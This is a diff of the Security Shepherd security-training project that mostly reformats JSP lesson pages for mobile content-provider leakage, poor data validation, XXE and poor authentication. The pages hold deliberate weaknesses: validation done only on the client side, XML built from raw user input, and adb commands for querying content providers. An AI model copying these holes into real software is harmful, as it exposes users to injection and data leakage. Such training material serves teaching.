+			ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " has been accessed by " + ses.getAttribute("userName").toString(), ses.getAttribute("userName"));
 
-    //Translation Stuff
-    Locale locale = new Locale(Validate.validateLanguage(request.getSession()));
-    ResourceBundle bundle = ResourceBundle.getBundle("i18n.lessons.m_content_provider_leakage." + levelHash, locale);
-    ResourceBundle mobile = ResourceBundle.getBundle("i18n.moduleGenerics.mobileGenericStrings", locale);
-    //Used more than once translations
-    String translatedLevelName = bundle.getString("title.question.content_provider_leak");
-
-    ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " Accessed");
-    if (request.getSession() != null) {
-        HttpSession ses = request.getSession();
-        //Getting CSRF Token from client
-        Cookie tokenCookie = null;
-        try {
-            tokenCookie = Validate.getToken(request.getCookies());
-        } catch (Exception htmlE) {
-            ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + ".jsp: tokenCookie Error:" + htmlE.toString());
-        }
-        // validateSession ensures a valid session, and valid role credentials
-        // If tokenCookie == null, then the page is not going to continue loading
-        if (Validate.validateSession(ses) && tokenCookie != null) {
-            ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " has been accessed by " + ses.getAttribute("userName").toString(), ses.getAttribute("userName"));
-
-            /*
-             * <br/><br/>
-             * This file is part of the Security Shepherd Project.
-             *
-             * The Security Shepherd project is free software: you can redistribute it and/or modify
-             * it under the terms of the GNU General Public License as published by
-             * the Free Software Foundation, either version 3 of the License, or
-             * (at your option) any later version.<br/>
-             *
-             * The Security Shepherd project is distributed in the hope that it will be useful,
-             * but WITHOUT ANY WARRANTY; without even the implied warranty of
-             * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
-             * GNU General Public License for more details.<br/>
-             *
-             * You should have received a copy of the GNU General Public License
-             * along with the Security Shepherd project.  If not, see <http://www.gnu.org/licenses/>.
-             *
-             * @author Sean Duggan
-             */
+	/*
+	 * <br/><br/>
+	 * This file is part of the Security Shepherd Project.
+	 * 
+	 * The Security Shepherd project is free software: you can redistribute it and/or modify
+	 * it under the terms of the GNU General Public License as published by
+	 * the Free Software Foundation, either version 3 of the License, or
+	 * (at your option) any later version.<br/>
+	 * 
+	 * The Security Shepherd project is distributed in the hope that it will be useful,
+	 * but WITHOUT ANY WARRANTY; without even the implied warranty of
+	 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+	 * GNU General Public License for more details.<br/>
+	 * 
+	 * You should have received a copy of the GNU General Public License
+	 * along with the Security Shepherd project.  If not, see <http://www.gnu.org/licenses/>. 
+	 *
+	 * @author Sean Duggan
+	 */
 %>
 <html xmlns="http://www.w3.org/1999/xhtml">
 <head>
-    <meta http-equiv="content-type" content="text/html; charset=utf-8"/>
-    <title>Security Shepherd - <%= translatedLevelName %>
-    </title>
-    <link href="../css/lessonCss/theCss.css" rel="stylesheet"
-          type="text/css" media="screen"/>
+<meta http-equiv="content-type" content="text/html; charset=utf-8" />
+<title>Security Shepherd - <%= translatedLevelName %></title>
+<link href="../css/lessonCss/theCss.css" rel="stylesheet"
+	type="text/css" media="screen" />
 
 </head>
 <body>
-<script type="text/javascript" src="../js/jquery.js"></script>
-<script type="text/javascript"
-        src="../js/clipboard-js/clipboard.min.js"></script>
-<script type="text/javascript" src="../js/clipboard-js/tooltips.js"></script>
-<script type="text/javascript"
-        src="../js/clipboard-js/clipboard-events.js"></script>
-<div id="contentDiv">
-    <h2 class="title"><%= translatedLevelName %>
-    </h2>
-    <p>
-    <div id="lessonIntro">
-
-        <br/>
-        <%= bundle.getString("paragraph.info.1") %>
-        <br/> <br/>
-        <%= bundle.getString("paragraph.info.2") %>: <br/> <br/>
+	<script type="text/javascript" src="../js/jquery.js"></script>
+	<script type="text/javascript"
+		src="../js/clipboard-js/clipboard.min.js"></script>
+	<script type="text/javascript" src="../js/clipboard-js/tooltips.js"></script>
+	<script type="text/javascript"
+		src="../js/clipboard-js/clipboard-events.js"></script>
+	<div id="contentDiv">
+		<h2 class="title"><%= translatedLevelName %></h2>
+		<p>
+		<div id="lessonIntro">
 
-        <ul>
-            <li>adb devices</li>
-            <li>adb connect [device IP]</li>
-            <li>adb shell content query --uri [Content Provider URI]</li>
-        </ul>
+			<br />
+			<%= bundle.getString("paragraph.info.1") %>
+			<br /> <br />
+			<%= bundle.getString("paragraph.info.2") %>: <br /> <br />
 
-        <br/> <input type="button"
-                     value="<%= bundle.getString("button.hideIntro") %>" id="hideLesson"/>
-    </div>
+			<ul>
+				<li>adb devices</li>
+				<li>adb connect [device IP]</li>
+				<li>adb shell content query --uri [Content Provider URI]</li>
+			</ul>
 
-    <input type="button"
-           value="<%= bundle.getString("button.showIntro") %>" id="showLesson"
-           style="display: none;"/> <br/>
-    <%= bundle.getString("challenge.description") %>
-    <br/> <br>
-    <%= mobile.getString("mobileBlurb.vmLink.1") + " CProviderLeakage.apk " + mobile.getString("mobileBlurb.vmLink.2") %>
+			<br /> <input type="button"
+				value="<%= bundle.getString("button.hideIntro") %>" id="hideLesson" />
+		</div>
 
-    <script>
+		<input type="button"
+			value="<%= bundle.getString("button.showIntro") %>" id="showLesson"
+			style="display: none;" /> <br />
+		<%= bundle.getString("challenge.description") %>
+		<br /> <br>
+		<%= mobile.getString("mobileBlurb.vmLink.1") + " CProviderLeakage.apk " + mobile.getString("mobileBlurb.vmLink.2") %>
 
-        $('#hideLesson').click(function () {
-            $("#lessonIntro").hide("slow", function () {
-                $("#showLesson").show("fast");
-            });
-        });
-
-        $("#showLesson").click(function () {
-            $('#showLesson').hide("fast", function () {
-                $("#lessonIntro").show("slow");
-            });
-        });
-    </script>
-    <% if (Analytics.googleAnalyticsOn) { %><%= Analytics.googleAnalyticsScript %>
-    <% } %>
-    </p>
-</div>
+		<script>
+				
+			$('#hideLesson').click(function(){
+				$("#lessonIntro").hide("slow", function(){
+					$("#showLesson").show("fast");
+				});
+			});
+			
+			$("#showLesson").click(function(){
+				$('#showLesson').hide("fast", function(){
+					$("#lessonIntro").show("slow");
+				});
+			});
+		</script>
+		<% if(Analytics.googleAnalyticsOn) { %><%= Analytics.googleAnalyticsScript %>
+		<% } %>
+		</p>
+	</div>
 </body>
 </html>
-<%
-        } else {
-            response.sendRedirect("../loggedOutSheep.html");
-        }
-    } else {
-        response.sendRedirect("../loggedOutSheep.html");
-    }
+<% 
+		}
+		else
+		{
+			response.sendRedirect("../loggedOutSheep.html");
+		}
+	}
+	else
+	{
+		response.sendRedirect("../loggedOutSheep.html");
+	}
 %>
\ No newline at end of file
diff --git a/src/main/webapp/lessons/4d8d50a458ca5f1f7e2506dd5557ae1f7da21282795d0ed86c55fefe41eb874f.jsp b/src/main/webapp/lessons/4d8d50a458ca5f1f7e2506dd5557ae1f7da21282795d0ed86c55fefe41eb874f.jsp
index 4182d37b6..02a96f28c 100644
--- a/src/main/webapp/lessons/4d8d50a458ca5f1f7e2506dd5557ae1f7da21282795d0ed86c55fefe41eb874f.jsp
+++ b/src/main/webapp/lessons/4d8d50a458ca5f1f7e2506dd5557ae1f7da21282795d0ed86c55fefe41eb874f.jsp
@@ -1,209 +1,224 @@
 <%@ page contentType="text/html; charset=UTF-8" pageEncoding="UTF-8"
-         language="java"
-         import="java.sql.*,java.io.*,java.net.*,org.owasp.encoder.Encode, dbProcs.*, utils.*"
-         errorPage="" %>
-<%@ page import="java.util.Locale, java.util.ResourceBundle" %>
+	language="java"
+	import="java.sql.*,java.io.*,java.net.*,org.owasp.encoder.Encode, dbProcs.*, utils.*"
+	errorPage=""%>
+<%@ page import="java.util.Locale, java.util.ResourceBundle"%>
 
 <%
-    /**
-     * <br/><br/>
-     * This file is part of the Security Shepherd Project.
-     *
-     * The Security Shepherd project is free software: you can redistribute it and/or modify
-     * it under the terms of the GNU General Public License as published by
-     * the Free Software Foundation, either version 3 of the License, or
-     * (at your option) any later version.<br/>
-     *
-     * The Security Shepherd project is distributed in the hope that it will be useful,
-     * but WITHOUT ANY WARRANTY; without even the implied warranty of
-     * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
-     * GNU General Public License for more details.<br/>
-     *
-     * You should have received a copy of the GNU General Public License
-     * along with the Security Shepherd project.  If not, see <http://www.gnu.org/licenses/>.
-     *
-     * @author Mark Denihan
-     */
+	/**
+	 * <br/><br/>
+	 * This file is part of the Security Shepherd Project.
+	 *
+	 * The Security Shepherd project is free software: you can redistribute it and/or modify
+	 * it under the terms of the GNU General Public License as published by
+	 * the Free Software Foundation, either version 3 of the License, or
+	 * (at your option) any later version.<br/>
+	 *
+	 * The Security Shepherd project is distributed in the hope that it will be useful,
+	 * but WITHOUT ANY WARRANTY; without even the implied warranty of
+	 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+	 * GNU General Public License for more details.<br/>
+	 *
+	 * You should have received a copy of the GNU General Public License
+	 * along with the Security Shepherd project.  If not, see <http://www.gnu.org/licenses/>.
+	 *
+	 * @author Mark Denihan
+	 */
 
-    final String LEVEL_NAME = "Poor Data Validation";
-    final String LEVEL_HASH = "4d8d50a458ca5f1f7e2506dd5557ae1f7da21282795d0ed86c55fefe41eb874f";
+	final String LEVEL_NAME = "Poor Data Validation";
+	final String LEVEL_HASH = "4d8d50a458ca5f1f7e2506dd5557ae1f7da21282795d0ed86c55fefe41eb874f";
 
-    //Translation Stuff
-    Locale locale = new Locale(Validate.validateLanguage(request.getSession()));
-    ResourceBundle bundle = ResourceBundle.getBundle("i18n.lessons.poor_data_validation." + LEVEL_HASH, locale);
-    //Used more than once translations
-    String translatedLevelName = bundle.getString("title.question.poor_data_validation");
+	//Translation Stuff
+	Locale locale = new Locale(Validate.validateLanguage(request.getSession()));
+	ResourceBundle bundle = ResourceBundle.getBundle("i18n.lessons.poor_data_validation." + LEVEL_HASH, locale);
+	//Used more than once translations
+	String translatedLevelName = bundle.getString("title.question.poor_data_validation");
 
-    ResourceBundle generic = ResourceBundle.getBundle("i18n.text", locale);
-    String owaspMoreInfo = generic.getString("module.generic.owasp.more.info");
-    String owaspGuideTo = generic.getString("module.generic.owasp.guide.to");
-    String owaspUrlAttack = FileInputProperties.readPropFileClassLoader("/uri.properties", "owasp.otg.buslogic.001");
+	ResourceBundle generic = ResourceBundle.getBundle("i18n.text", locale);
+	String owaspMoreInfo = 	generic.getString("module.generic.owasp.more.info");
+	String owaspGuideTo = generic.getString("module.generic.owasp.guide.to");
+	String owaspUrlAttack = FileInputProperties.readPropFileClassLoader("/uri.properties", "owasp.otg.buslogic.001");
 
-    ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), LEVEL_NAME + " Accessed");
-    if (request.getSession() != null) {
-        HttpSession ses = request.getSession();
-        //Getting CSRF Token from client
-        Cookie tokenCookie = null;
-        try {
-            tokenCookie = Validate.getToken(request.getCookies());
-        } catch (Exception htmlE) {
-            ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), LEVEL_NAME + ".jsp: tokenCookie Error:" + htmlE.toString());
-        }
-        // validateSession ensures a valid session, and valid role credentials
-        // If tokenCookie == null, then the page is not going to continue loading
-        if (Validate.validateSession(ses) && tokenCookie != null) {
-            ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), LEVEL_NAME + " has been accessed by " + ses.getAttribute("userName").toString(), ses.getAttribute("userName"));
+	ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), LEVEL_NAME + " Accessed");
+	if (request.getSession() != null)
+	{
+	    HttpSession ses = request.getSession();
+		//Getting CSRF Token from client
+		Cookie tokenCookie = null;
+		try
+		{
+			tokenCookie = Validate.getToken(request.getCookies());
+		}
+		catch(Exception htmlE)
+		{
+			ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), LEVEL_NAME +".jsp: tokenCookie Error:" + htmlE.toString());
+		}
+		// validateSession ensures a valid session, and valid role credentials
+		// If tokenCookie == null, then the page is not going to continue loading
+		if (Validate.validateSession(ses) && tokenCookie != null)
+		{
+			ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), LEVEL_NAME + " has been accessed by " + ses.getAttribute("userName").toString(), ses.getAttribute("userName"));
 
-%>
+ %>
 
 <html xmlns="http://www.w3.org/1999/xhtml">
 <head>
-    <meta http-equiv="content-type" content="text/html; charset=utf-8"/>
-    <title>Security Shepherd - <%= translatedLevelName %>
-    </title>
-    <link href="../css/lessonCss/theCss.css" rel="stylesheet"
-          type="text/css" media="screen"/>
+<meta http-equiv="content-type" content="text/html; charset=utf-8" />
+<title>Security Shepherd - <%= translatedLevelName %></title>
+<link href="../css/lessonCss/theCss.css" rel="stylesheet"
+	type="text/css" media="screen" />
 
 </head>
 <body>
-<script type="text/javascript" src="../js/jquery.js"></script>
-<script type="text/javascript"
-        src="../js/clipboard-js/clipboard.min.js"></script>
-<script type="text/javascript" src="../js/clipboard-js/tooltips.js"></script>
-<script type="text/javascript"
-        src="../js/clipboard-js/clipboard-events.js"></script>
-<div id="contentDiv">
-    <h2 class="title"><%= translatedLevelName %>
-    </h2>
-    <p>
-    <div id="lessonIntro">
-        <%= bundle.getString("paragraph.info.1") %>
-        <br/> <br/>
-        <%= bundle.getString("paragraph.info.2") %>
-        <br/> <br/>
-        <%= bundle.getString("paragraph.info.3") %>
-        <br/> <br/>
-        <%= owaspMoreInfo %>
-        <a href="<%= owaspUrlAttack %>" target="_blank"><%= owaspGuideTo %>
-            Poor Data Validation
-        </a> <br/> <br/> <input type="button"
-                                value="<%= bundle.getString("button.hideIntro") %>" id="hideLesson"/>
-    </div>
-
-    <input type="button"
-           value="<%= bundle.getString("button.showIntro") %>" id="showLesson"
-           style="display: none;"/> <br/> <br/>
-    <%= bundle.getString("challenge.description")%>
-    <div id="hint" style="display: none;">
-        <h2 class="title"><%= bundle.getString("challenge.hintHeader") %>
-        </h2>
-        <%= bundle.getString("challenge.hint") %>
-        <br/> <br/>
-    </div>
-    <br/> <br/>
-    <div id="badData"></div>
-    <form id="leForm" action="javascript:;">
-        <table>
-            <tr>
-                <td><%= bundle.getString("challenge.enterNumber") %>:</td>
-                <td><input type="text" id="numberBox" autocomplete="off"/></td>
-            <tr>
-                <td colspan="2">
-                    <div id="submitButton">
-                        <input type="submit"
-                               value="<%= bundle.getString("button.submitNumber") %>"/>
-                    </div>
-                    <p style="display: none;" id="loadingSign"><%= bundle.getString("button.loading") %>...
-                    </p>
-                    <div style="display: none;" id="hintButton">
-                        <input type="button"
-                               value="<%= bundle.getString("button.hint") %>?"
-                               id="theHintButton"/>
-                    </div>
-                </td>
-            </tr>
-        </table>
-    </form>
-
-    <div id="resultsDiv"></div>
-    </p>
-</div>
-<script>
-    var counter = 0;
-    $("#leForm").submit(function () {
-        counter = counter + 1;
-        console.log("Counter: " + counter);
-        var number = $("#numberBox").val();
-        var theError = "";
-        if (number.length == 0) {
-            console.log("No Number Submitted");
-            theError = "<%= bundle.getString("error.noNumber") %>";
-        } else if (number < 0) {
-            console.log("Invalid Number Submitted");
-            theError = "<%= bundle.getString("error.badNumber") %>";
-        } else {
-            $("#badData").hide("fast");
-            $("#submitButton").hide("fast");
-            $("#loadingSign").show("slow");
-            $("#resultsDiv").hide("slow", function () {
-                var ajaxCall = $.ajax({
-                    type: "POST",
-                    url: "<%= LEVEL_HASH %>",
-                    data: {
-                        userdata: number
-                    },
-                    async: false
-                });
-                if (ajaxCall.status == 200) {
-                    $("#resultsDiv").html(ajaxCall.responseText);
-                } else {
-                    $("#resultsDiv").html("<p> An Error Occurred: " + ajaxCall.status + " " + ajaxCall.statusText + "</p>");
-                }
-                $("#resultsDiv").show("slow", function () {
-                    $("#loadingSign").hide("fast", function () {
-                        $("#submitButton").show("slow");
-                    });
-                });
-            });
-        } //End of If Else
-        if (counter == 3) {
-            console.log("Showing Hint Button");
-            $("#hintButton").show("slow");
-        }
-        if (theError.length > 0) {
-            $("#badData").html("<p> <%= bundle.getString("error.occured") %>:" + theError + "</p>");
-            $("#badData").show("slow");
-        }
-    });
-
-    $("#theHintButton").click(function () {
-        $("#hintButton").hide("fast", function () {
-            $("#hint").show("fast");
-        });
-    });
-    ;
+	<script type="text/javascript" src="../js/jquery.js"></script>
+	<script type="text/javascript"
+		src="../js/clipboard-js/clipboard.min.js"></script>
+	<script type="text/javascript" src="../js/clipboard-js/tooltips.js"></script>
+	<script type="text/javascript"
+		src="../js/clipboard-js/clipboard-events.js"></script>
+	<div id="contentDiv">
+		<h2 class="title"><%= translatedLevelName %></h2>
+		<p>
+		<div id="lessonIntro">
+			<%= bundle.getString("paragraph.info.1") %>
+			<br /> <br />
+			<%= bundle.getString("paragraph.info.2") %>
+			<br /> <br />
+			<%= bundle.getString("paragraph.info.3") %>
+			<br /> <br />
+			<%= owaspMoreInfo %>
+			<a href="<%= owaspUrlAttack %>" target="_blank"> <%= owaspGuideTo %>
+				Poor Data Validation
+			</a> <br /> <br /> <input type="button"
+				value="<%= bundle.getString("button.hideIntro") %>" id="hideLesson" />
+		</div>
 
-    $('#hideLesson').click(function () {
-        $("#lessonIntro").hide("slow", function () {
-            $("#showLesson").show("fast");
-        });
-    });
+		<input type="button"
+			value="<%= bundle.getString("button.showIntro") %>" id="showLesson"
+			style="display: none;" /> <br /> <br />
+		<%= bundle.getString("challenge.description")%>
+		<div id="hint" style="display: none;">
+			<h2 class="title"><%= bundle.getString("challenge.hintHeader") %></h2>
+			<%= bundle.getString("challenge.hint") %>
+			<br /> <br />
+		</div>
+		<br /> <br />
+		<div id="badData"></div>
+		<form id="leForm" action="javascript:;">
+			<table>
+				<tr>
+					<td><%= bundle.getString("challenge.enterNumber") %>:</td>
+					<td><input type="text" id="numberBox" autocomplete="off" /></td>
+				<tr>
+					<td colspan="2">
+						<div id="submitButton">
+							<input type="submit"
+								value="<%= bundle.getString("button.submitNumber") %>" />
+						</div>
+						<p style="display: none;" id="loadingSign"><%= bundle.getString("button.loading") %>...
+						</p>
+						<div style="display: none;" id="hintButton">
+							<input type="button"
+								value="<%= bundle.getString("button.hint") %>?"
+								id="theHintButton" />
+						</div>
+					</td>
+				</tr>
+			</table>
+		</form>
 
-    $("#showLesson").click(function () {
-        $('#showLesson').hide("fast", function () {
-            $("#lessonIntro").show("slow");
-        });
-    });
-</script>
-<% if (Analytics.googleAnalyticsOn) { %><%= Analytics.googleAnalyticsScript %>
-<% } %>
+		<div id="resultsDiv"></div>
+		</p>
+	</div>
+	<script>
+			var counter=0;
+			$("#leForm").submit(function(){
+				counter = counter + 1;
+				console.log("Counter: " + counter);
+				var number = $("#numberBox").val();
+				var theError = "";
+				if(number.length == 0)
+				{
+					console.log("No Number Submitted");
+					theError = "<%= bundle.getString("error.noNumber") %>";		
+				}
+				else if (number < 0)
+				{
+					console.log("Invalid Number Submitted");
+					theError = "<%= bundle.getString("error.badNumber") %>";
+				}
+				else
+				{
+					$("#badData").hide("fast");
+					$("#submitButton").hide("fast");
+					$("#loadingSign").show("slow");
+					$("#resultsDiv").hide("slow", function(){
+						var ajaxCall = $.ajax({
+							type: "POST",
+							url: "<%= LEVEL_HASH %>",
+							data: {
+								userdata: number
+							},
+							async: false
+						});
+						if(ajaxCall.status == 200)
+						{
+							$("#resultsDiv").html(ajaxCall.responseText);
+						}
+						else
+						{
+							$("#resultsDiv").html("<p> An Error Occurred: " + ajaxCall.status + " " + ajaxCall.statusText + "</p>");
+						}
+						$("#resultsDiv").show("slow", function(){
+							$("#loadingSign").hide("fast", function(){
+								$("#submitButton").show("slow");
+							});
+						});
+					});
+				} //End of If Else
+				if (counter == 3)
+				{
+					console.log("Showing Hint Button");
+					$("#hintButton").show("slow");
+				}
+				if (theError.length > 0)
+				{
+					$("#badData").html("<p> <%= bundle.getString("error.occured") %>:" + theError + "</p>");
+					$("#badData").show("slow");
+				}
+			});
+			
+			$("#theHintButton").click(function() {
+				$("#hintButton").hide("fast", function(){
+					$("#hint").show("fast");
+				});
+			});;
+			
+			$('#hideLesson').click(function(){
+				$("#lessonIntro").hide("slow", function(){
+					$("#showLesson").show("fast");
+				});
+			});
+			
+			$("#showLesson").click(function(){
+				$('#showLesson').hide("fast", function(){
+					$("#lessonIntro").show("slow");
+				});
+			});
+		</script>
+	<% if(Analytics.googleAnalyticsOn) { %><%= Analytics.googleAnalyticsScript %>
+	<% } %>
 </body>
 </html>
 <%
-        } else {
-            response.sendRedirect("../loggedOutSheep.html");
-        }
-    } else {
-        response.sendRedirect("../loggedOutSheep.html");
-    }
+	}
+	else
+	{
+		response.sendRedirect("../loggedOutSheep.html");
+	}
+}
+else
+{
+	response.sendRedirect("../loggedOutSheep.html");
+}
 %>
diff --git a/src/main/webapp/lessons/57dda1bf9a2ca1c34e04f815491ef40836d9b710179cd19754ec5b3c31f27d1a.jsp b/src/main/webapp/lessons/57dda1bf9a2ca1c34e04f815491ef40836d9b710179cd19754ec5b3c31f27d1a.jsp
index 9fb3120d6..5d944e3f7 100644
--- a/src/main/webapp/lessons/57dda1bf9a2ca1c34e04f815491ef40836d9b710179cd19754ec5b3c31f27d1a.jsp
+++ b/src/main/webapp/lessons/57dda1bf9a2ca1c34e04f815491ef40836d9b710179cd19754ec5b3c31f27d1a.jsp
@@ -34,7 +34,7 @@
     String i18nLevelName = bundle.getString("title.question.xxe");
 
     ResourceBundle generic = ResourceBundle.getBundle("i18n.text", locale);
-    String owaspMoreInfo = generic.getString("module.generic.owasp.more.info");
+    String owaspMoreInfo = 	generic.getString("module.generic.owasp.more.info");
     String owaspGuideTo = generic.getString("module.generic.owasp.guide.to");
     String owaspUrlAttack = FileInputProperties.readPropFileClassLoader("/uri.properties", "owasp.attack.xxe");
 
@@ -61,86 +61,82 @@
 %>
 <html xmlns="http://www.w3.org/1999/xhtml">
 <head>
-    <meta http-equiv="content-type" content="text/html; charset=utf-8"/>
-    <title>Security Shepherd - <%=i18nLevelName%>
-    </title>
-    <link href="../css/lessonCss/theCss.css" rel="stylesheet"
-          type="text/css" media="screen"/>
+<meta http-equiv="content-type" content="text/html; charset=utf-8" />
+<title>Security Shepherd - <%=i18nLevelName%>
+</title>
+<link href="../css/lessonCss/theCss.css" rel="stylesheet"
+	type="text/css" media="screen" />
 </head>
 <body>
-<script type="text/javascript" src="../js/jquery.js"></script>
-<script type="text/javascript"
-        src="../js/clipboard-js/clipboard.min.js"></script>
-<script type="text/javascript" src="../js/clipboard-js/tooltips.js"></script>
-<script type="text/javascript"
-        src="../js/clipboard-js/clipboard-events.js"></script>
-<div id="contentDiv">
-    <h2 class="title"><%= i18nLevelName %>
-    </h2>
-    <p>
-    <div id="lessonIntro">
-        <%= bundle.getString("paragraph.info.1") %>
-        <br/> <br/>
-        <%= bundle.getString("paragraph.info.2")%>
-        <br/> <br/>
-        <%= bundle.getString("paragraph.info.3") %>
-        <br/>
-        <%= owaspMoreInfo %>
-        <a href="<%= owaspUrlAttack %>" target="_blank"><%= owaspGuideTo %>
-            XXE
-        </a> <br/> <br/>
-        <%= bundle.getString("example.text") %>
-        1: <br>
-        <code><%= bundle.getString("example.xxe.1") %>
-        </code>
-        <br/>
-        <br/>
-        <%= bundle.getString("example.text") %>
-        2: <br>
-        <code><%= bundle.getString("example.xxe.2") %>
-        </code>
-        <br/> <br/> <input type="button"
-                           value="<%= bundle.getString("button.hideIntro") %>" id="hideLesson"/>
-    </div>
-    <input type="button"
-           value="<%= bundle.getString("button.showIntro") %>" id="showLesson"
-           style="display: none;"/> <br/>
-    <%= bundle.getString("paragraph.whattodo.xxe")
+	<script type="text/javascript" src="../js/jquery.js"></script>
+	<script type="text/javascript"
+		src="../js/clipboard-js/clipboard.min.js"></script>
+	<script type="text/javascript" src="../js/clipboard-js/tooltips.js"></script>
+	<script type="text/javascript"
+		src="../js/clipboard-js/clipboard-events.js"></script>
+	<div id="contentDiv">
+		<h2 class="title"><%= i18nLevelName %>
+		</h2>
+		<p>
+		<div id="lessonIntro">
+			<%= bundle.getString("paragraph.info.1") %>
+			<br /> <br />
+			<%= bundle.getString("paragraph.info.2")%>
+			<br /> <br />
+			<%= bundle.getString("paragraph.info.3") %>
+			<br />
+			<%= owaspMoreInfo %>
+			<a href="<%= owaspUrlAttack %>" target="_blank"> <%= owaspGuideTo %>
+				XXE
+			</a> <br /> <br />
+			<%= bundle.getString("example.text") %>
+			1: <br>
+			<code><%= bundle.getString("example.xxe.1") %></code>
+			<br />
+			<br />
+			<%= bundle.getString("example.text") %>
+			2: <br>
+			<code><%= bundle.getString("example.xxe.2") %></code>
+			<br /> <br /> <input type="button"
+				value="<%= bundle.getString("button.hideIntro") %>" id="hideLesson" />
+		</div>
+		<input type="button"
+			value="<%= bundle.getString("button.showIntro") %>" id="showLesson"
+			style="display: none;" /> <br />
+		<%= bundle.getString("paragraph.whattodo.xxe")
             + "<b>" + System.getProperty("user.dir") + "/"
             + FileInputProperties.readPropFileClassLoader("/fileSystemKeys.properties", "xxe.lesson.file") + "</b>" %>
-    <br/> <br/>
-    <form id="leForm" action="javascript:;" contentType="application/xml">
-        <table>
-            <tr>
-                <td><%= bundle.getString("paragraph.info.emailAddr") %>
-                </td>
-            </tr>
-            <tr>
-                <td><input style="width: 400px;" id="emailAddr" type="text"
-                           autocomplete="off"/></td>
-            </tr>
-            <tr>
-                <td>
-                    <div id="submitButton">
-                        <input type="submit"
-                               value="<%= bundle.getString("button.resetPassword") %>"/>
-                    </div>
-                    <p style="display: none;" id="loadingSign"><%= bundle.getString("word.info.loading") %>
-                    </p>
-                    <div style="display: none;" id="hintButton">
-                        <input type="button"
-                               value="<%= bundle.getString("sentence.question.wouldYouLikeHint") %>"
-                               id="theHintButton"/>
-                    </div>
-                </td>
-            </tr>
-        </table>
-    </form>
+		<br /> <br />
+		<form id="leForm" action="javascript:;" contentType="application/xml">
+			<table>
+				<tr>
+					<td><%= bundle.getString("paragraph.info.emailAddr") %></td>
+				</tr>
+				<tr>
+					<td><input style="width: 400px;" id="emailAddr" type="text"
+						autocomplete="off" /></td>
+				</tr>
+				<tr>
+					<td>
+						<div id="submitButton">
+							<input type="submit"
+								value="<%= bundle.getString("button.resetPassword") %>" />
+						</div>
+						<p style="display: none;" id="loadingSign"><%= bundle.getString("word.info.loading") %></p>
+						<div style="display: none;" id="hintButton">
+							<input type="button"
+								value="<%= bundle.getString("sentence.question.wouldYouLikeHint") %>"
+								id="theHintButton" />
+						</div>
+					</td>
+				</tr>
+			</table>
+		</form>
 
-    <div id="resultsDiv"></div>
-    </p>
-</div>
-<script>
+		<div id="resultsDiv"></div>
+		</p>
+	</div>
+	<script>
     $("#leForm").submit(function () {
         $("#submitButton").hide("fast");
         $("#loadingSign").show("slow");
@@ -148,17 +144,18 @@
         $("#resultsDiv").hide("slow", function () {
             var ajaxCall = $.ajax({
                 type: "POST",
-                beforeSend: function (request) {
+                beforeSend: function(request) {
                     request.setRequestHeader("csrfToken", "<%= csrfToken %>");//don't forget the "" around the Java variable or JS will try convert
                 },
                 contentType: "application/xml",
                 url: "<%= LEVEL_HASH %>",
-                data: "<?xml version=\"1.0\"?><email>" + theEmailAddr + "</email>",
+                data: "<?xml version=\"1.0\"?><email>"+ theEmailAddr +"</email>",
                 async: false
             });
             if (ajaxCall.status == 200) {
                 $("#resultsDiv").html(ajaxCall.responseText);
-            } else {
+            }
+            else {
                 $("#resultsDiv").html("<p> <%= bundle.getString("error.occurred") %>: "
                     + ajaxCall.status + " " + ajaxCall.statusText + "</p>");
             }
@@ -182,8 +179,8 @@
         });
     });
 </script>
-<% if (Analytics.googleAnalyticsOn) { %><%= Analytics.googleAnalyticsScript %>
-<% } %>
+	<% if (Analytics.googleAnalyticsOn) { %><%= Analytics.googleAnalyticsScript %>
+	<% } %>
 </body>
 </html>
 <%
diff --git a/src/main/webapp/lessons/77777b312d5b56a17c1f30550dd34e8d6bd8b037f05341e64e94f5411c10ac8e.jsp b/src/main/webapp/lessons/77777b312d5b56a17c1f30550dd34e8d6bd8b037f05341e64e94f5411c10ac8e.jsp
index fe08cf362..a1d89d65f 100644
--- a/src/main/webapp/lessons/77777b312d5b56a17c1f30550dd34e8d6bd8b037f05341e64e94f5411c10ac8e.jsp
+++ b/src/main/webapp/lessons/77777b312d5b56a17c1f30550dd34e8d6bd8b037f05341e64e94f5411c10ac8e.jsp
@@ -1,110 +1,117 @@
 <%@ page contentType="text/html; charset=UTF-8" pageEncoding="UTF-8"
-         language="java" import="utils.*" errorPage="" %>
-<%@ page import="java.util.Locale, java.util.ResourceBundle" %>
+	language="java" import="utils.*" errorPage=""%>
+<%@ page import="java.util.Locale, java.util.ResourceBundle"%>
 
 <%
-    //No Quotes In level Name
-    String levelName = "What is Poor Authentication?";
+//No Quotes In level Name
+String levelName = "What is Poor Authentication?";
 //Alphanumeric Only
-    String levelHash = "77777b312d5b56a17c1f30550dd34e8d6bd8b037f05341e64e94f5411c10ac8e";
+String levelHash = "77777b312d5b56a17c1f30550dd34e8d6bd8b037f05341e64e94f5411c10ac8e";
 //Translation Stuff
-    Locale locale = new Locale(Validate.validateLanguage(request.getSession()));
-    ResourceBundle bundle = ResourceBundle.getBundle("i18n.lessons.m_poor_authentication." + levelHash, locale);
-    ResourceBundle mobile = ResourceBundle.getBundle("i18n.moduleGenerics.mobileGenericStrings", locale);
+Locale locale = new Locale(Validate.validateLanguage(request.getSession()));
+ResourceBundle bundle = ResourceBundle.getBundle("i18n.lessons.m_poor_authentication." + levelHash, locale);
+ResourceBundle mobile = ResourceBundle.getBundle("i18n.moduleGenerics.mobileGenericStrings", locale);
